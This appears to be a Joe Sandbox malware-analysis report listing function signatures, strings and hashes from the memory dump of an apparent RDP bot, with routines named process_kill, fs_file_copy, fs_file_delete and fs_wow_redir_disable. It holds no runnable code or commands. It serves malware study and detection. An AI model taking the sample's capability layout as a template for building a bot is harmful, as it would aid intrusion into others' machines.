                                                                                                                  • Instruction Fuzzy Hash: 21118E15A1D70342FE9DBB55E49433A3691AF5F785F042035CD1ECAAB7DE2EF8458201
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                  • Opcode ID: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
                                                                                                                  • Instruction ID: 58ce54174f340354929868b136f5192599405d1ee358705cbf64ad4809788b49
                                                                                                                  • Opcode Fuzzy Hash: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
                                                                                                                  • Instruction Fuzzy Hash: 87119011A1D70342FE9CBB55E49433A3691AF5F785F042035CD1ECAAB7DE2EF8458200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                  • Opcode ID: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
                                                                                                                  • Instruction ID: a446310db21dfadd7f2694cffd6c68f5931d1b0787e68a35cde11ec6640e9dee
                                                                                                                  • Opcode Fuzzy Hash: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
                                                                                                                  • Instruction Fuzzy Hash: D0119011A1D70342FE9CBB55E48433A3691AF5F785F042035CD1ECAAB7DE2EF8458600
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                  • Opcode ID: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
                                                                                                                  • Instruction ID: 887d1d7bb2357dc8cc07f25653b6e8c11f41b9f5dd6671ea203e2fd6293fca86
                                                                                                                  • Opcode Fuzzy Hash: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
                                                                                                                  • Instruction Fuzzy Hash: E4119011A1D70342FE9C7B55E48433A3691AF5F785F042035CD1EC6AB7DE2EF8458200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                  • API String ID: 2887799713-3464183404
                                                                                                                  • Opcode ID: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
                                                                                                                  • Instruction ID: cf56bd6b9721cffd4f84d5c8a8283933a00c83e19a3d28adfcf94989a44a20e1
                                                                                                                  • Opcode Fuzzy Hash: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
                                                                                                                  • Instruction Fuzzy Hash: CB41AF50D0D61686FAA4B656E84037926907F0FBCCF556132C91FC7BB6EFACEA818301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                  • API String ID: 2018770650-4119452840
                                                                                                                  • Opcode ID: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
                                                                                                                  • Instruction ID: 14ffe684ea2e13f6307e38c33bb02d79be11ef9d264b06d9b15031ce77339740
                                                                                                                  • Opcode Fuzzy Hash: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
                                                                                                                  • Instruction Fuzzy Hash: A3310C55E0C60792FAA076ACE4407BC22615F8F744F5B2032C92ECBBF3ED1CA9859312
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                  • API String ID: 39653677-892027187
                                                                                                                  • Opcode ID: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
                                                                                                                  • Instruction ID: 5f62cce728094c61b5dfd1ed3a4b5e75d3b16ef0371244aa81e8d942133721c5
                                                                                                                  • Opcode Fuzzy Hash: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
                                                                                                                  • Instruction Fuzzy Hash: 42510191B0D29781FA65BA19E820BB916507F0F78CF582032D91ECBBB7DE2CE9418301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$strcat
                                                                                                                  • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                                                                                  • API String ID: 2335785903-2423714266
                                                                                                                  • Opcode ID: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
                                                                                                                  • Instruction ID: 6e5f8ac28ece1a604b62bb626614a09c74ccf62a0568d97c6caffe3248a76a20
                                                                                                                  • Opcode Fuzzy Hash: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
                                                                                                                  • Instruction Fuzzy Hash: 1411AC61A0CA4344FA157F26E8143F956919F0FB88F4CA030DE2DCA7A7EE2CA4018350
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fwprintf$strlen
                                                                                                                  • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                  • API String ID: 2636243462-2115465065
                                                                                                                  • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                                                                                  • Instruction ID: 32b117da8eda7e5e06674a1b18deb3294a3b624fb3fac7e5e21af5068741f7e9
                                                                                                                  • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                                                                                                  • Instruction Fuzzy Hash: 3E319062E1CB5286E750BA35E804579A2B1EB4EBA8F04D131DD1DCBBA7DE2CE450CB40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                  • API String ID: 3511525774-1584720945
                                                                                                                  • Opcode ID: 581d58713fef439bd45245ce21fe2b6351d16353e86ecf35ae421406ccb4171c
                                                                                                                  • Instruction ID: 7ca7e4b7cf0126df7cd07d63e5f77357af52d9288cebc164ac46c1a1c4b9214c
                                                                                                                  • Opcode Fuzzy Hash: 581d58713fef439bd45245ce21fe2b6351d16353e86ecf35ae421406ccb4171c
                                                                                                                  • Instruction Fuzzy Hash: 6511D760F1DA4791FB54BB29E8913B423A0AF5F304F946036D42EC66B3EE6CE949C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                  • API String ID: 1533789296-1853374401
                                                                                                                  • Opcode ID: f535ca4141984a50a72a308d8c09dee6f2ac98f5997e9eeb245545f9f5efda59
                                                                                                                  • Instruction ID: 3855b0805b0519f77bd527219cfa880e09e14f821c0566b8ce0d55b4f47a03a5
                                                                                                                  • Opcode Fuzzy Hash: f535ca4141984a50a72a308d8c09dee6f2ac98f5997e9eeb245545f9f5efda59
                                                                                                                  • Instruction Fuzzy Hash: 7801D660E1DA43A1FB51BB29E8903B42360AF1F304F946036D42EC6AB3EF6DE945C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                                                                                                  • API String ID: 2962429428-1801624891
                                                                                                                  • Opcode ID: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
                                                                                                                  • Instruction ID: 6362188cc9fca02c4d27f4995f103a80e8f7eaad9ed9109651a2fb9c64146c90
                                                                                                                  • Opcode Fuzzy Hash: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
                                                                                                                  • Instruction Fuzzy Hash: 0CF01562A2C85B81EF14FB65EC602B82720BF4E748F844132DA1DC7672DE3CE946C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeviceErrorLastQuery
                                                                                                                  • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                                                                                                  • API String ID: 963133057-3473575966
                                                                                                                  • Opcode ID: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
                                                                                                                  • Instruction ID: 28abd73573cbb9563d565fc2dcd0056b40e88bf6cfe0bdd91867bc6bae8f7d1d
                                                                                                                  • Opcode Fuzzy Hash: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
                                                                                                                  • Instruction Fuzzy Hash: EE418C12E1C56782FA707618E440BB95251AF4EBA4F252032DD5ED7AF7DE6DEC808382
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fwprintf
                                                                                                                  • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                                                                                                  • API String ID: 968622242-2451587232
                                                                                                                  • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                                                                                  • Instruction ID: 3f34a300deb39c8c01ca57b44ea0b5089cae31762a40b7b8c687d68ed67ade0a
                                                                                                                  • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                                                                                                  • Instruction Fuzzy Hash: 0B31C872A0CB0745E760BE25C4045796BA1EF4EB94F04D131E92DCBAA6DE2CE4208B10
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                  • Opcode ID: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
                                                                                                                  • Instruction ID: f897e31f9b99ade169b9ef2b219654522f4e5e9faa52b4601e4f1703de375168
                                                                                                                  • Opcode Fuzzy Hash: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
                                                                                                                  • Instruction Fuzzy Hash: C7F0B224A1D64785FA08BB61E8A43753360BF4F304F849535C42DD62B3DF7C648AC350
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF64B94A1E8,00000000,?,?,?,00007FF64B94A1E0,00007FF64B931208,?,?,?,00007FF64B931313), ref: 00007FF64B93ABC2
                                                                                                                  Strings
                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF64B93AA62
                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF64B93AAEB
                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF64B93AB5D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                  • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                                                                                  • Instruction ID: bd4d8625a3ad0dead220dd4fccc96e8938e084d91c35a6a6a05ac69fe3ba7e7f
                                                                                                                  • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                                                                                                  • Instruction Fuzzy Hash: 26616E62F0C54286EA20BB65D54427C27A2AB4EBA4F059135D91DC7BFADE3DE582C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
